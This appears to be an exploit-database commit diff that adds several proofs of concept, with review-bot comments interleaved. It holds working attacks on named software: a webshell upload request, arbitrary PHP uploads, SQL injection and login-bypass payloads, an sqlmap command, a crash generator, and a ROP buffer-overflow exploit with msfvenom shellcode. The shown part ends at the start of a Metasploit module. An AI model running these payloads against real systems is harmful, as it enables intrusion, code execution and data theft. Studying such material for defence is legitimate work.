+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUOOyIF2f26nDrsM7
+Referer: http://172.16.122.4/webiness_inventory-2.3/index.php?request=partners/index/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,fr;q=0.8,fr-FR;q=0.7
+Cookie: resolve_ids=0; order_dir_list_by=1A; _csrf=b49cff27d7c0ccd3a8dd5af3813025249dc909f2a20c12efcb7770f945715b06a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%224dWxR4kKmI-ZSWJBsigl0tHhdecVhozc%22%3B%7D;
language=32d49278f28c78229de164fe79dc13b6adb3c98af2d133240eb1ffc44771ad3da%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22en%22%3B%7D; PHPSESSID=h66id6epvp8g1uoshrdog53323
+Connection: close
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="model_name"
+
+PartnerModel
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="id"
+
+2
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="partner_name"
+
+My crucial Partner
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="logo"; filename="shell.php"
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="id_number"
+
+25
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="tax_number"
+
+225588664477
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="iban"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="address1"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="address2"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="region_state"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="zip"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="city"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="country"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="email"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="web"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name="phone_number"
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name=""
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7
+Content-Disposition: form-data; name=""
+
+------WebKitFormBoundaryUOOyIF2f26nDrsM7--
+
+# Access your webshell via the below link
+http://172.16.122.4/webiness_inventory-2.3/runtime/PartnerModel/shell.php?cmd=whoami
\ No newline at end of file
diff --git a/exploits/php/webapps/45747.txt b/exploits/php/webapps/45747.txt
new file mode 100644
index 000000000..a03dd6999
--- /dev/null
+++ b/exploits/php/webapps/45747.txt
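Review bot: The header says `Version: 2.9<` while the request path and the final URL both use `webiness_inventory-2.3/`, so the tested version is unclear — state the version that was actually tested and write the affected range as `<= 2.9` if that is what is meant. The quoted `WsSaveToModel.php` (lines 46-71) checks only the 3 MB size and then calls `move_uploaded_file($fileTmp, $destDir.'/'.$fileName)` with the client-supplied name and no extension or content check, which is the whole bug; the advisory should add the fix: allow-list extensions/MIME from server-side inspection, rename to a server-generated name, and keep `runtime/` out of the web root or deny PHP execution there. The `shell.php` body in the POC is missing from this copy (the line after `Content-Type: application/octet-stream` is empty), so the `?cmd=whoami` link at the end cannot be matched to a payload.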
@@ -0,0 +1,86 @@
+# Exploit Title: MyBB Downloads 2.0.3 - SQL Injection
+# Date: 28-10-2018
+# Exploit Author: Lucian Ioan Nitescu
+# Contact: https://twitter.com/LucianNitescu
+# Webiste: https://nitesculucian.github.io
+# Vendor Homepage: https://github.com/vintagedaddyo/MyBB_Plugin-Downloads
+# Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Downloads
+# Version: 2.0.3
+# Tested on: Ubuntu 18.04
+
+1. Description:
+
+It is a plugin which adds a page to download files. If enabled, regular members can add new downloads to the page after admin approval.
+
+2. Proof of Concept:
+
+Persistent XSS
+- Go to downloads.php page
+- Create a New Download
+- Add the following to the title: a"
+- Now on submit, the user will be prompted to an SQL Injection specific error.
+
+```
+MyBB has experienced an internal SQL error and cannot continue.
+
+SQL Error:
+ 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"a""' at line 1
+Query:
+ SELECT * FROM mybb_downloads WHERE name="a""
+```
+
+- THis can be exploited with: sqlmap -r request_file -p name --threads 5
+
+3.
Request File example:
+
+POST /downloads.php?newdownload=1 HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost:8081/downloads.php?newdownload=1
+Content-Type: multipart/form-data; boundary=---------------------------171894060312075061251712806160
+Content-Length: 1029
+Cookie: mybb[lastvisit]=1540744980; mybb[lastactive]=1540745020; sid=677a58d33fe23e7f2ea3841c79496fcd; loginattempts=1; mybbuser=3_waeMfSMiIRrTpPqW2uy8ZF8AMx8pyRtMCUJ6Gx0yoGRyLBsBow
+Connection: close
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="my_post_key"
+
+6cb47e578ed16aa5272c55b0cb8745b4
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="name"
+
+a"
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="shortdesc"
+
+test
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="description"
+
+test
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="image"
+
+
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="url"
+
+1
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="numimages"
+
+4
+-----------------------------171894060312075061251712806160
+Content-Disposition: form-data; name="submit"
+
+Publish download
+-----------------------------171894060312075061251712806160--
+
+3. Solution:
+
+There is no public available solution.
\ No newline at end of file
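Review bot: The Proof of Concept section is headed `Persistent XSS`, but every step under it (the `a"` title, the `1064` MySQL error, the `SELECT * FROM mybb_downloads WHERE name="a""` query) demonstrates SQL injection, as the title says; rename the heading to `SQL Injection` so the advisory does not contradict itself. The numbering is also off: `3. Request File example:` and `3. Solution:` share a number, so the solution should be `4.`. The solution line could at least point at the fix, since the error shows the `name` value concatenated straight into the query: escape it with MyBB's `$db->escape_string()` (or use a parameterised insert) in the plugin's new-download handler.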
diff --git a/exploits/php/webapps/45751.txt b/exploits/php/webapps/45751.txt
new file mode 100644
index 000000000..167b37de9
--- /dev/null
+++ b/exploits/php/webapps/45751.txt
@@ -0,0 +1,92 @@
+# Exploit Title: Expense Management 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.webprojectbuilder.com/item/expense-management
+# Software Link: https://kent.dl.sourceforge.net/project/expense-management/php_ci-expense_manager-script-1.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/user/add_edit
+#
+# http://localhost/[PATH]/assets/images/[FILE]
+#
+POST /[PATH]/user/add_edit HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=
+---------------------------187769406514267903921739782647
+Content-Length: 743
+-----------------------------187769406514267903921739782647
+Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
+Content-Type: application/force-download
+
+-----------------------------187769406514267903921739782647
+Content-Disposition: form-data; name="fileOld"
+g_1540845821.php
+-----------------------------187769406514267903921739782647
+Content-Disposition: form-data; name="users_id"
+1
+-----------------------------187769406514267903921739782647
+Content-Disposition: form-data; name="user_type"
+admin
+-----------------------------187769406514267903921739782647
+Content-Disposition: form-data; name="submit1"
+-----------------------------187769406514267903921739782647--
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 20:50:40 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056; expires=Mon, 29-Oct-2018 22:50:40 GMT; Max-Age=7200; path=/; HttpOnly
+Expires:
Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+refresh: 0;url=http://localhost/[PATH]/user/login
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+GET /[PATH]/assets/images/phpinfo_1540846240.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 20:51:11 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/user/add_edit
+#
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/45752.txt b/exploits/php/webapps/45752.txt
new file mode 100644
index 000000000..03ed6a9ba
--- /dev/null
+++ b/exploits/php/webapps/45752.txt
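Review bot: The upload response carries `refresh: 0;url=http://localhost/[PATH]/user/login`, i.e. the request was sent with only a `PHPSESSID` cookie and was bounced to the login page, yet the follow-up GET for `assets/images/phpinfo_1540846240.php` returns 200 — if that means the file is written before the authentication check, the advisory should say so in one line (`# no authenticated session needed: the file is stored before the redirect to login (verify)`), because it changes the finding from authenticated to pre-auth upload. The stored name is the original basename plus a Unix timestamp (`phpinfo_1540846240.php`), so `assets/images/[FILE]` is predictable from the response `Date` header; that deserves a sentence instead of a placeholder. POC 2 is empty in this copy (only blank `+` lines follow `# http://localhost/[PATH]/user/add_edit`), so either its request needs restoring or the heading should go.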
@@ -0,0 +1,122 @@
+# Exploit Title: University Application System 1.0 - SQL Injection / Cross-Site Request Forgery (Add Admin)
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/pamzey
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Patrick%20Mvuma/unima.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/process.php
+#
+#[PATH]/process.php
+#....
+#1001 if(isset($_POST['addmember']))
+#1002 {
+#1003 if($_POST['memail']!=''&&$_POST['mfname']!=''&&$_POST['msname']!=''&&$_POST['mpassword']!=''&&$_POST['mpasswords']!='')
+#1004 {
+#1005
+#1006 $mfname = mysqli_real_escape_string($db,$_POST['mfname']);
+#1007 $msname = mysqli_real_escape_string($db,$_POST['msname']);
+#1008 $memail=mysqli_real_escape_string($db,$_POST['memail']);
+#1009 $mphone =mysqli_real_escape_string($db,$_POST['mphone']);
+#1010 $rpassword = mysqli_real_escape_string($db,$_POST['mpasswords']);
+#1011 $mpassword = mysqli_real_escape_string($db,$_POST['mpassword']);
+#....
+POST /[PATH]/process.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; serial=%27or+1%3D1+or+%27%27%3D%27; PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 87
+mfname=efe&msname=efe&memail=efe@omerefe.com&mpassword=efe&mpasswords=efe&addmember=ghj
+HTTP/1.1 302 Found
+Date: Mon, 29 Oct 2018 18:44:36 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: addadmin.php
+Content-Length: 127
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/process.php
+#
+#[PATH]/process.php
+#....
+#973 if(isset($_POST['schoolgrade'])){
+#974
+#975 //$adname=$_POST[''];
+#976 $adname =$_POST["schoolgrade"];
+#....
+POST /[PATH]/process.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; serial=%27or+1%3D1+or+%27%27%3D%27; PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 236
+schoolgrade='||(SeleCT 'Efe' FroM duAL WheRE 110=110 AnD (seLEcT 112 frOM(SElecT CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct (ELT(112=112,1))),FLooR(RAnd(0)*2))x FROM INFOrmatION_SchEMA.PluGINS grOUp BY x)a))||'
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 18:51:22 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 421
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 3)
+# http://localhost/[PATH]/process.php
+#
+#[PATH]/process.php
+#....
+#516 if(isset($_POST['usernames'])&&$_POST['password']) {
+#517
+#518 $usernames=$_POST['usernames'];
+#519 $password=$_POST['password'];
+#....
+POST /[PATH]/process.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 51
+usernames='or 1=1 or ''='&password='or 1=1 or ''='
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 18:04:45 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Set-Cookie: pin=%27or+1%3D1+or+%27%27%3D%27; expires=Mon, 05-Nov-2018 18:04:45 GMT; Max-Age=604800
+Set-Cookie: serial=%27or+1%3D1+or+%27%27%3D%27; expires=Mon, 05-Nov-2018 18:04:45 GMT; Max-Age=604800
+Content-Length: 247
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45753.txt b/exploits/php/webapps/45753.txt
new file mode 100644
index 000000000..ec54010f6
--- /dev/null
+++ b/exploits/php/webapps/45753.txt
@@ -0,0 +1,91 @@
+# Exploit Title: Notes Manager 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.webprojectbuilder.com/item/notes-management
+# Software Link: https://astuteinternet.dl.sourceforge.net/project/notes-manager/notes_management.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/user/add_edit
+#
+# http://localhost/[PATH]/assets/images/[FILE]
+#
+POST /[PATH]/user/add_edit HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------95839047417419306891039500038
+Content-Length: 737
+-----------------------------95839047417419306891039500038
+Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
+Content-Type: application/force-download
+
+-----------------------------95839047417419306891039500038
+Content-Disposition: form-data; name="fileOld"
+g_1540845821.php
+-----------------------------95839047417419306891039500038
+Content-Disposition: form-data; name="users_id"
+1
+-----------------------------95839047417419306891039500038
+Content-Disposition: form-data; name="user_type"
+admin
+-----------------------------95839047417419306891039500038
+Content-Disposition: form-data; name="submit1"
+-----------------------------95839047417419306891039500038--
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 21:10:19 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Set-Cookie: ci_session=00cf0a180900e0b110b84343140d8f1c77a68493; expires=Mon, 29-Oct-2018 23:10:19 GMT; Max-Age=7200; path=/; HttpOnly
+refresh: 0;url=http://localhost/[PATH]/user/login
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+GET /[PATH]/assets/images/phpinfo_1540847419.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=00cf0a180900e0b110b84343140d8f1c77a68493
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 21:10:42 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/user/add_edit
+#
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/45754.txt b/exploits/php/webapps/45754.txt
new file mode 100644
index 000000000..94d46db8c
--- /dev/null
+++ b/exploits/php/webapps/45754.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Instagram Clone 1.0 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-10-30
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.sourcecodester.com/users/justinwilliam
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/justinwilliam/instagram_3.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/add_profile.php
+#
+# http://localhost/[PATH]/uploads/[FILE]
+#
+POST /[PATH]/add_profile.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=
+---------------------------18601636361709893820977649577
+Content-Length: 369
+-----------------------------18601636361709893820977649577
+Content-Disposition: form-data; name="photo"; filename="phpinfo.php"
+Content-Type: application/force-download
+
+-----------------------------18601636361709893820977649577
+Content-Disposition: form-data; name="submit"
+-----------------------------18601636361709893820977649577--
+HTTP/1.1 200 OK
+Date: Mon, 29 Oct 2018 19:24:03 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 1101
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 2)
+# http://localhost/[PATH]/add_profile.php
+#
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/windows/dos/45749.py b/exploits/windows/dos/45749.py
new file mode 100755
index 000000000..025a32828
--- /dev/null
+++ b/exploits/windows/dos/45749.py
@@ -0,0 +1,25 @@
+# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 Denial of Service (PoC)
+# Date: 2018-10-29
+# Exploit Author: Yair Rodríguez Aparicio
+# Vendor Homepage: https://www.qnap.com/en/
+# Software Link: https://www.qnap.com/en/download
+# Version: 4.5.6.0607
+# Tested on: Windows XP Profesional Español SP3 x86
+
+# Steps to Produce the Crash:
+# 1.- Run python code : python qnap.py
+# 2.- Open text.txt and copy content to clipboard
+# 3.- Open NetBak Replicator.exe
+# 4.- click on Restauración Instantánea
+# 5.- Seleccione Origen -> "Ubicacion de red"
+# 6.- click on "Dirección URL WebDAV"
+# 7.- Paste ClipBoard on "Dirección URL WebDAV"
+# 8.- Click "Aceptar".
+# 9.- Crashed!
+
+
+
+buffer = "\x41" * 5000
+f = open("text.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/45738.py b/exploits/windows/local/45738.py
new file mode 100755
index 000000000..b93e93023
--- /dev/null
+++ b/exploits/windows/local/45738.py
@@ -0,0 +1,79 @@
+#!/usr/bin/python
+
+
+###############################################
+# R 3.4.4 Win10 x86 Buffer Overflow #
+# discovered by: bzyo #
+# author: Charles Truscott #
+# I love you Alison Thompson OAM #
+# tested on: Windows 10 x86 #
+# rebooted for practice defeating ASLR/DEP #
+# #
+# --------------------------------------------#
+
+##############################################
+
+# GUI Preferences -> paste boom.txt into 'Language for menus ...' -> click OK
+
+import struct
+
+pad = "A" * 292
+
+rop = struct.pack("L", 0x6cbef3c0) # POP EAX # RETN [R.dll]
+rop += struct.pack("L", 0x6e732b48) # ptr to &VirtualAlloc() [IAT R.dll]
+rop += struct.pack("L", 0x6cba178c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [R.dll]
+rop += struct.pack("L", 0x6ca57139) # XCHG EAX,ESI # RETN [R.dll]
+rop += struct.pack("L", 0x6bed7b2a) # POP EBP # RETN [Rlapack.dll]
+rop += struct.pack("L", 0x6ca2a9bd) # & jmp esp [R.dll]
+rop += struct.pack("L", 0x6cbef3c0) # POP EAX # RETN [R.dll]
+rop += struct.pack("L", 0xffffffff) # Value to negate, will become 0x00000001
+rop += struct.pack("L", 0x6397474a) # NEG EAX # RETN [graphics.dll]
+rop += struct.pack("L", 0x6c94e84f) # XCHG EAX,EBX # RETN [R.dll]
+rop += struct.pack("L", 0x6cbef3e4) # POP EAX # RETN [R.dll]
+rop += struct.pack("L", 0xe7bf59f1) # put delta into eax (-> put 0x00001000 into edx)
+rop += struct.pack("L", 0x6fed580f) # ADD EAX,1840B60F # RETN [grDevices.dll]
+rop += struct.pack("L", 0x6ca3485a) # XCHG EAX,EDX # RETN [R.dll]
+rop += struct.pack("L", 0x63760b48) # POP ECX # RETN [Rgraphapp.dll]
+rop += struct.pack("L", 0xffffffc0) # Value to negate, will become 0x00000040
+rop += struct.pack("L", 0x71364d80) # NEG ECX # RETN [stats.dll]
+rop += struct.pack("L", 0x6fed44a0) # POP EDI # RETN [grDevices.dll]
+rop += struct.pack("L", 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]
+rop += struct.pack("L", 0x6c998dce) # POP EAX # RETN [R.dll]
+rop += struct.pack("L", 0x90909090) # nop
+rop += struct.pack("L", 0x7135a86c) # PUSHAD # RETN [stats.dll]
+
+
+nop = "A" * 20
+
+# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' cmd=calc.exe exitfunc=thread -f python
+
+boom = ""
+boom += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+boom += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+boom += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+boom += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+boom += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+boom += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+boom += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+boom += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+boom += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+boom += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+boom += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+boom += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+boom += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+boom += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+boom += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+boom += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+boom += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+
+
+
+end = "\xCC" * 588
+
+poc = pad + rop + nop + boom + end
+
+file = open("boom.txt", "w")
+file.write(poc)
+file.close
+print "<3"
\ No newline at end of file
diff --git a/exploits/windows/local/45744.rb b/exploits/windows/local/45744.rb
new file mode 100755
index 000000000..0e43f3855
--- /dev/null
+++ b/exploits/windows/local/45744.rb
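Review bot: `file.close` on the next-to-last line of the hunk names the method without calling it, so the handle is never explicitly closed and the written bytes only reach disk when the interpreter exits; it should be `file.close()`, or the three file lines replaced by `with open("boom.txt", "w") as out: out.write(poc)`. The name `file` also shadows a Python 2 builtin, and the `print "<3"` statement shows this script is Python 2 only, which the bare `#!/usr/bin/python` shebang does not make explicit. The header comment at the top of the hunk says "Win10 x86" and "tested on: Windows 10 x86", while the row added for 45738 in the files_exploits.csv hunk of this same commit says "Windows 10 x64"; the file and the index should agree on the tested platform.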
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Any Sound Recorder 2.93 Buffer Overflow (SEH)',
+ 'Description' => %q{
+ This module exploits a stack based buffer overflow in Any Sound Recorder 2.93, when
+ with the name "hack.txt". Copy the content of the "hack.txt",Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
+ },
